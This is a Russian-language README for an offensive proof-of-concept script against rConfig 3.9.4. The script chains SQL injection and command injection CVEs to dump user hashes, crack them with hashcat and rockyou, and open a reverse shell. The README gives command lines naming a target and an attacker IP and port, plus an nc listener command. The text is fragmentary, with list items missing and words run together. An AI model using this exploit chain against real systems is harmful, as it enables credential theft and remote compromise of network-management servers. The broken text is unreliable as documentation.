
Объединённые PoC для rConfig: SQL-инъекция (CVE-2020-10220) и Командная инъекция (CVE-2020-10879)
Этот PoC нацелен на rConfig версии 3.9.4 и демонстрирует эксплуатацию с помощью комбинации уязвимостей SQL-инъекции и удаленной инъекции команд. Он автоматизирует процесс:
rockyou и правил best64.rulesЭтот скрипт основан и объединяет два оригинальных PoC:
Был модифицирован для автоматизации взлома и опционального запуска оболочки.
requests (pip install requests)hashcat, доступный через командную строкуrockyou.txt (или эквивалентный), расположенный по пути /usr/share/wordlists/rockyou.txt/usr/share/hashcat/rules/best64.ruleТолько дамп пользователей и хэшей:
python3 rConfig_rce.py https://target
Для дампа пользователей, взлома паролей и попытки RCE (требуется IP-адрес и порт атакующего для обратной оболочки):
python3 rConfig_rce.py https://target attacker_ip attacker_port
admin для фазы инъекции команд.nc -lvnp 80) на вашей машине атакующего для получения обратной оболочки.Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование против систем без разрешения незаконно и неэтично.